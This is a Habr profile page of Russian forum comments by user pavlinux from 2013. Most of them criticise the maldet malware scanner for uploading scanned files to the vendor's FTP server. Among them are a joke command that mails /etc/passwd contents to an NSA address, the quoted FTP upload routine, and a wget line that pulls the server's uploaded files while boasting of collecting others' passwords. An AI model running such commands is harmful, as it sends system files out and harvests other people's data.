Комментарии / Профиль pavlinux / Хабр

Пользователь

pavlinux 25 сен 2013 в 12:50

В АНБ порадуются

bash: /etc/shadow: Permission denied

-2

Linux pipes tips & tricks

pavlinux 25 сен 2013 в 10:22

Ах да, автор — забыл: document here

grep root < /etc/passwd | mail -s "Thank you"  archive@nsa.gov

-2

Linux pipes tips & tricks

pavlinux 25 сен 2013 в 10:18

1-курсник видимо, Робаческого проходят, пайпы :)

-2

Linux pipes tips & tricks

pavlinux 25 сен 2013 в 10:13

pipefail — это костыль мешающей работе!
Если утиль ничего не вернула это тоже результат, а не ошибка!

-1

Apple iPhone 5s: вскрытие, сравнение с предыдущими поколениями и оценка ремонтопригодности

pavlinux 22 сен 2013 в 07:33

Скоро яблочники на болтики от Applе дрочить начнут!

-18

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 16:52

Если автор этой поделки такой элитный UNIXойд, то должен знать, что флаги

-a — означает ALL (все дефолтные опции),
-с — именно проверка.
-r — рекурсия
-q — quiet — тихо, без трейса, только результат или даже без него.
-d — daemon, а не -b

Единственное с чем он попал это kill и update остальное не Unix-way :)

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 16:45

Ах да, документацию у нас вообще-то редко кто читает :)

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 16:42

Нет там такого

 ./maldet 
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

signature set: 201309132982
usage maldet [-h|--help] [-l|--log] [-e|--report] [-p|--purge] [-c|--checkout]
[-b|--background] [-m|--monitor] [-k|--kill-monitor] [-a|--scan-all] [-r|--scan-recent]
[-q|--quarantine] [-s|--restore] [-n|--clean] [-u|--update] [-d|--update-ver]

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 16:41

Еще раз объясняю, запусти

maldet --checkout /var/www/

Слово checkout переводится как проверять, а не проверить и если чо отправить на АНБшный сервер. Более того, о таких вещах надо предупреждать и делать доп. флаг (типа --yes ), дабы не спрашивать каждый раз.

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 16:21

Ну вот например один ССЗБ уже есть :)
Надо просто запустить maldet -c /var/www, где флаг -с описан как checkout, а не send-to-remote-analyses

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 16:15

В общем народ, стремная эта штука! Выкачаивайте свои сайты и проверяйте на тестовых компах, дома, на виртуалках…
На боевой сервер, да ещё и в крон сувать… ну не знаю, я очкую. :)

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 15:53

Спасибо, я выкачал рекурсивно всю директорию, сижу собираю ваши пароли к базам и сайтам :)

wget -r ftp://ftp.rfxn.com/incoming/*

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 15:49

А никто не знает, зачем этот троян сливает все к себе на FTP?

host=ftp.rfxn.com
user=anonymous
passwd=anonymous
upath=incoming


ftp -v -n -i $host << EOT
user $user@rfxn.com $passwd
prompt
cd $upath
lcd $lcd
binary
put "$file" "$RANDOM.$$.bin"
ascii
put "$file" "$RANDOM.$$.ascii"
bye
EOT

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 15:09

Блин, мужики, если в скрипте заменить $instpath на $PWD, то ничё устанавливать не нужно.

public_scan=1 — чтоб не от рута пускать!

diff -ur maldetect-1.4.2.orig/files/conf.maldet maldetect-1.4.2/files/conf.maldet
--- maldetect-1.4.2.orig/files/conf.maldet      2013-04-09 11:17:30.000000000 +0400
+++ maldetect-1.4.2/files/conf.maldet   2013-09-21 18:59:49.000000000 +0400
@@ -95,7 +95,7 @@
 # quarantine, session and temporary paths to faciliate scans.
 # These paths are populated through cron every 10min with the
 # /etc/cron.d/maldet_pub cronjob.
-public_scan=0
+public_scan=1
 
 ##
 # [ STATISTICAL ANALYSIS ]
diff -ur maldetect-1.4.2.orig/files/maldet maldetect-1.4.2/files/maldet
--- maldetect-1.4.2.orig/files/maldet   2013-04-13 08:58:30.000000000 +0400
+++ maldetect-1.4.2/files/maldet        2013-09-21 18:58:48.000000000 +0400
@@ -9,7 +9,7 @@
 ##
 #
 ver=1.4.2
-inspath=/usr/local/maldetect
+inspath=$PWD
 cnf=$inspath/conf.maldet
 intcnf=$inspath/internals.conf
 datestamp=`date +"%m%d%y-%H%M"`

есессенно с inotify сами разрулите

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 15:00

Хотя, вроде хватит:

$ rm -rf  $instpath  /etc/cron.daily/maldet

Linux Malware Detect — антивирус для веб-серверов

pavlinux 21 сен 2013 в 14:53

unistall.sh ещё бы.

Экономия на спичках, или Неуловимый Джо возвращается

pavlinux 8 сен 2013 в 20:27

readahead ощутимее добавляет

Закон Сохранения [ вставить по вкусу ] — если где-то прибыло, значит где-то убыло. :)
Есть фича Copy-on-Write, но она вроде только на ext2 работает.
Вот такой костыль ещё есть

Мини-ПК под Linux за 45 долларов

pavlinux 6 сен 2013 в 15:24

А чё, на этом сайте принято минусовать за мнение отличное от большинства?
Ну и прекрасно, живите тогда в иллюзиях, хрен больше скажу!

Мини-ПК под Linux за 45 долларов

pavlinux 6 сен 2013 в 15:11

И работать с гигабайтами инфы — это из области придуманной фантастики.

-1

Мини-ПК под Linux за 45 долларов

pavlinux 6 сен 2013 в 11:17

Я собственно не о наших задротствах, а о людях думаю «Юрий Венедиктович» :)
гики могут чё хошь делать, для обычных смертных оно нафиг не нужно. Не терабайты, не гигабиты…